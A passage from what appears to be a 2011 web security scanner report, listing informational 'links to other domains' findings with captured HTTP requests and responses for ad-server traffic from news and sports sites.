Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 316
Date: Sun, 04 Sep 2011 00:43:40 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/c;235049696;0-0;0;13655887;3454-728/90;40293483/40311270/1;;~aopt=2/0/ff/0;~sscs=%3fhttp://und.cstvauctions.com/gallery.cfm"><img src="http://s0.2mdn.net/viewad/1271868/nd_auct-011211-728.gif" border=0 alt="Bid Now!"></a>
...[SNIP]...

20.3. http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/CSTV.ND/SPORTS.MFOOTBL.BODY

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/CSTV.ND/SPORTS.MFOOTBL.BODY;sect=mfootbl;pos=top;sz=728x90;tile=3;dcopt=ist;ord=4556314295623451?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1271867/nd_hosp-030711-728.gif

Request

GET /adj/CSTV.ND/SPORTS.MFOOTBL.BODY;sect=mfootbl;pos=top;sz=728x90;tile=3;dcopt=ist;ord=4556314295623451? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 399
Date: Sun, 04 Sep 2011 00:43:44 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/k;237761631;0-0;0;13655887;3454-728/90;41051266/41069053/1;;~aopt=2/0/ff/0;~sscs=%3fhttp://notredame-hospitality.cbscollegestore.com/store.cfm?dept_id=17785&store_id=468&partner_id=18082"><img src="http://s0.2mdn.net/viewad/1271867/nd_hosp-030711-728.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

20.4. http://ad.doubleclick.net/adj/mi.clt00/Sports previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/mi.clt00/Sports

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/mi.clt00/Sports;atf=Y;dcove=d;pl=story;sect=SportsSportsHoldSports;pos=1;sz=100x25;tile=2;!c=news;pub=CharlotteObserver2;ord=791353263858316;gender=;year=;income=?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/827661/CLT_DealSaverPromo_100x25_070811.gif

Request

GET /adj/mi.clt00/Sports;atf=Y;dcove=d;pl=story;sect=SportsSportsHoldSports;pos=1;sz=100x25;tile=2;!c=news;pub=CharlotteObserver2;ord=791353263858316;gender=;year=;income=? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 323
Date: Sun, 04 Sep 2011 00:44:09 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/o;244071137;0-0;1;34538914;1548-100/25;43034600/43052387/1;;~sscs=%3fhttp://charlotte.dealsaver.com"><img src="http://s0.2mdn.net/viewad/827661/CLT_DealSaverPromo_100x25_070811.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

20.5. http://ad.doubleclick.net/adj/mi.clt00/Sports previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/mi.clt00/Sports

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/mi.clt00/Sports;atf=Y;dcove=d;pl=story;sect=SportsSportsHoldSports;pos=1;sz=300x100;tile=3;!c=news;pub=CharlotteObserver2;ord=791353263858316;gender=;year=;income=?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/mi.clt00/Sports;atf=Y;dcove=d;pl=story;sect=SportsSportsHoldSports;pos=1;sz=300x100;tile=3;!c=news;pub=CharlotteObserver2;ord=791353263858316;gender=;year=;income=? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 245
Date: Sun, 04 Sep 2011 00:44:11 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/m;44306;0-0;0;34538914;3823-300/100;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

20.6. http://ad.doubleclick.net/adj/mi.sac00/Lifestyle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/mi.sac00/Lifestyle

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/mi.sac00/Lifestyle;dcove=d;pl=story;lvl6=WireLifestyle;loc=ats;pos=1;reg=0;sz=100x25;tile=2;ord=5715951826423407?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/mi.sac00/Lifestyle;dcove=d;pl=story;lvl6=WireLifestyle;loc=ats;pos=1;reg=0;sz=100x25;tile=2;ord=5715951826423407? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 246
Date: Sun, 04 Sep 2011 00:44:15 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/v;44306;0-0;0;17382208;1548-100/25;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

20.7. http://ad.doubleclick.net/adj/mi.sac00/Lifestyle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/mi.sac00/Lifestyle

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/mi.sac00/Lifestyle;dcove=d;pl=story;lvl6=WireLifestyle;loc=bts;pos=1;reg=0;sz=300x100;tile=4;ord=5715951826423407?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1498419/101203_promo_300x100_neverknowguy.jpg

Request

GET /adj/mi.sac00/Lifestyle;dcove=d;pl=story;lvl6=WireLifestyle;loc=bts;pos=1;reg=0;sz=300x100;tile=4;ord=5715951826423407? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 352
Date: Sun, 04 Sep 2011 00:44:46 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/0/0/%2a/l;236915174;6-0;0;17382208;3823-300/100;39717452/39735239/1;;~sscs=%3fhttp://findnsave.sacbee.com/%5b%5bHASH%5d%5dadlink=fns"><img src="http://s0.2mdn.net/viewad/1498419/101203_promo_300x100_neverknowguy.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

20.8. http://admeld.adnxs.com/usersync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The page was loaded from a URL containing a query string:

http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=6422714091563403120&expiration=0

Request

GET /usersync?calltype=admeld&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; sess=1; uuid2=6422714091563403120; anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZV2FP?n>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3I*!2a3C06.$K

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:01:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:01:36 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Sun, 04 Sep 2011 01:01:36 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=6422714091563403120&expiration=0" width="0" height="0"/>');

20.9. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://affiliates.eblastengine.com
Path:	/Widgets/EmailSignup.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx?wcguid=29DFC999-F0F3-482A-9516-C8414B36C6AD&height=100&width=275

The response contains the following links to other domains:

http://affiliates.upickem.net/shared/includes/SkinLight.css
http://affiliates.upickem.net/shared/includes/UpickemFrontEngine.css
http://eblastengine.upickem.net/EBlastEngine.css

Request

GET /Widgets/EmailSignup.aspx?wcguid=29DFC999-F0F3-482A-9516-C8414B36C6AD&height=100&width=275 HTTP/1.1
Host: affiliates.eblastengine.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=28
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Sep 2011 01:02:47 GMT
Last-Modified: Sun, 04 Sep 2011 01:01:47 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sun, 04 Sep 2011 01:02:18 GMT
Content-Length: 6773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Email S
...[SNIP]...
</title>
<link rel="stylesheet" href="//affiliates.upickem.net/shared/includes/UpickemFrontEngine.css" type="text/css" />
<link rel="stylesheet" href="//affiliates.upickem.net/shared/includes/SkinLight.css" type="text/css" />
<link rel="stylesheet" href="//eblastengine.upickem.net/EBlastEngine.css" type="text/css" />
<link rel="shortcut icon" href="Images/favicon.ico" type="image/x-icon"/>
...[SNIP]...

20.10. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/13966-88303-3335-5

Issue detail

The page was loaded from a URL containing a query string:

http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5?mpt=1119678&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/x%3B245665919%3B0-0%3B1%3B43087964%3B3454-728/90%3B43451397/43469184/1%3B%3B%7Eokv%3D%3Btype%3Dleaderboard%3Bsz%3D728x90%3Btile%3D1%3Bvbc%3Dcfa%3BarticleID%3DUSTRE78222D20110903%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f

The response contains the following links to other domains:

http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/x;245665919;0-0;1;43087964;3454-728/90;43451397/43469184/1;;~okv=;type=leaderboard;sz=728x90;tile=1;vbc=cfa;articleID=USTRE78222D20110903;~aopt=6/1/ff/1;~sscs=?http://altfarm.mediaplex.com/ad/ck/13966-88303-3335-5?mpt=1119678
http://js.c12s.com/ant-cf.js?0_740_139668830333355_0_53_100004

Request

GET /ad/js/13966-88303-3335-5?mpt=1119678&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/x%3B245665919%3B0-0%3B1%3B43087964%3B3454-728/90%3B43451397/43469184/1%3B%3B%7Eokv%3D%3Btype%3Dleaderboard%3Bsz%3D728x90%3Btile%3D1%3Bvbc%3Dcfa%3BarticleID%3DUSTRE78222D20110903%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 517
Date: Sun, 04 Sep 2011 00:45:20 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/x;245665919;0-0;1;43087964;3454-728/90;43451397/43469184/1;;~okv=;type=leaderboard;sz=728x90;tile=1;vbc=cfa;articleID=USTRE78222D20110903;~aopt=6/1/ff/1;~sscs=?http://altfarm.mediaplex.com/ad/ck/13966-88303-3335-5?mpt=1119678"><img ismap border=0 src="http://img-cdn.mediaplex.com/0/13966/gift-v2-st-728x90.gif" ></a><script language="JavaScript" src="http://js.c12s.com/ant-cf.js?0_740_139668830333355_0_53_100004"></script>
...[SNIP]...

20.11. http://anrtx.tacoda.net/rtx/r.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://anrtx.tacoda.net
Path:	/rtx/r.js

Issue detail

The page was loaded from a URL containing a query string:

http://anrtx.tacoda.net/rtx/r.js?cmd=LCN&si=17778&pi=-&xs=3&pu=http%253A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html%253Fifu%253Dhttp%25253A//www.google.com/trends/hottrends%25253Fq%25253Dsprint%252526date%25253D2011-9-3%252526sa%25253DX&df=1&v=6.0&cb=85182

The response contains the following link to another domain:

http://tacoda.at.atwola.com/rtx/r.js?cmd=LCN&si=17778&pi=-&xs=3&pu=http%253A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html%253Fifu%253Dhttp%25253A//www.google.com/trends/hottrends%25253Fq%25253Dsprint%252526date%25253D2011-9-3%252526sa%25253DX&df=1&v=6.0&cb=85182&tid=&mig=3

Request

GET /rtx/r.js?cmd=LCN&si=17778&pi=-&xs=3&pu=http%253A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html%253Fifu%253Dhttp%25253A//www.google.com/trends/hottrends%25253Fq%25253Dsprint%252526date%25253D2011-9-3%252526sa%25253DX&df=1&v=6.0&cb=85182 HTTP/1.1
Host: anrtx.tacoda.net
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 01:06:39 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Set-Cookie: mig=3; path=/; expires=Tue, 13-Dec-11 01:06:39 GMT; domain=anrtx.tacoda.net
Location: http://tacoda.at.atwola.com/rtx/r.js?cmd=LCN&si=17778&pi=-&xs=3&pu=http%253A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html%253Fifu%253Dhttp%25253A//www.google.com/trends/hottrends%25253Fq%25253Dsprint%252526date%25253D2011-9-3%252526sa%25253DX&df=1&v=6.0&cb=85182&tid=&mig=3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 596

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://tacoda.at.atwola.com/rtx/r.js?cmd=LCN&si=17778&pi=-&xs=3&pu=http%253A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html%253Fifu%253Dhttp%25253A//www.google.com/trends/hottrends%25253Fq%25253Dsprint%252526date%25253D2011-9-3%252526sa%25253DX&df=1&v=6.0&cb=85182&tid=&mig=3">here</A>
...[SNIP]...

20.12. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=audsci

The response contains the following link to another domain:

http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEOfruwaKEzWGvrIKzVwqd-c&cver=1

Request

GET /pixel?nid=audsci HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 302 Found
Location: http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEOfruwaKEzWGvrIKzVwqd-c&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 341
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEOfruwaKEzWGvrIKzVwqd-c&cver=1">here</A>
...[SNIP]...

20.13. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?google_nid=rubicon&google_cm&google_sc

The response contains the following link to another domain:

http://pixel.rubiconproject.com/tap.php?v=7751&nid=2249&expires=30&put=CAESEGMUSetziKiEuzwBhcLJxAU&google_cver=1

Request

GET /pixel?google_nid=rubicon&google_cm&google_sc HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 302 Found
Location: http://pixel.rubiconproject.com/tap.php?v=7751&nid=2249&expires=30&put=CAESEGMUSetziKiEuzwBhcLJxAU&google_cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:44:14 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 325
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://pixel.rubiconproject.com/tap.php?v=7751&nid=2249&expires=30&put=CAESEGMUSetziKiEuzwBhcLJxAU&google_cver=1">here</A>
...[SNIP]...

20.14. http://cm.npc-mcclatchy.overture.com/js_1_0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.npc-mcclatchy.overture.com
Path:	/js_1_0/

Issue detail

The page was loaded from a URL containing a query string:

http://cm.npc-mcclatchy.overture.com/js_1_0/?config=1001507650&type=lifestyle&ctxtId=lifestyle&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&ctxtCat=lifestyle&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097138735&ctxtContent=%3Chead%3E%0A%20%0A%0A%0A%0A%0A%0A%0A%0A%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20language%3D%22JavaScript%22%3E%0A%3C!--%20%0Avar%20gomez%3D%7B%20%0A%09gs%3A%20new%20Date().getTime()%2C%20%0A%09acctId%3A'D3FD89'%2C%20%0A%09pgId%3A'story-detail'%2C%20%0A%09grpId%3A'Sacbee'%20%0A%7D%3B%0A%0A%0A%2F*Gomez%20tag%20version%3A%207.0*%2Fvar%20gomez%3Dgomez%3Fgomez%3A%7B%7D%3Bgomez.h3%3Dfunction(d%2C%20s)%7Bfor(var%20p%20in%20s)%7Bd%5Bp%5D%3Ds%5Bp%5D%3B%7Dreturn%20d%3B%7D%3Bgomez.h3(gomez%2C%7Bb3%3Afunction(r)%7Bif(r%3C%3D0)return%20false%3Breturn%20Math.random()%3C%3Dr%26%26r%3B%7D%2Cb0

The response contains the following links to other domains:

http://info.yahoo.com/services/us/yahoo/ads/details.html
http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css

Request

GET /js_1_0/?config=1001507650&type=lifestyle&ctxtId=lifestyle&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&ctxtCat=lifestyle&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097138735&ctxtContent=%3Chead%3E%0A%20%0A%0A%0A%0A%0A%0A%0A%0A%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20language%3D%22JavaScript%22%3E%0A%3C!--%20%0Avar%20gomez%3D%7B%20%0A%09gs%3A%20new%20Date().getTime()%2C%20%0A%09acctId%3A'D3FD89'%2C%20%0A%09pgId%3A'story-detail'%2C%20%0A%09grpId%3A'Sacbee'%20%0A%7D%3B%0A%0A%0A%2F*Gomez%20tag%20version%3A%207.0*%2Fvar%20gomez%3Dgomez%3Fgomez%3A%7B%7D%3Bgomez.h3%3Dfunction(d%2C%20s)%7Bfor(var%20p%20in%20s)%7Bd%5Bp%5D%3Ds%5Bp%5D%3B%7Dreturn%20d%3B%7D%3Bgomez.h3(gomez%2C%7Bb3%3Afunction(r)%7Bif(r%3C%3D0)return%20false%3Breturn%20Math.random()%3C%3Dr%26%26r%3B%7D%2Cb0 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:20:48 GMT
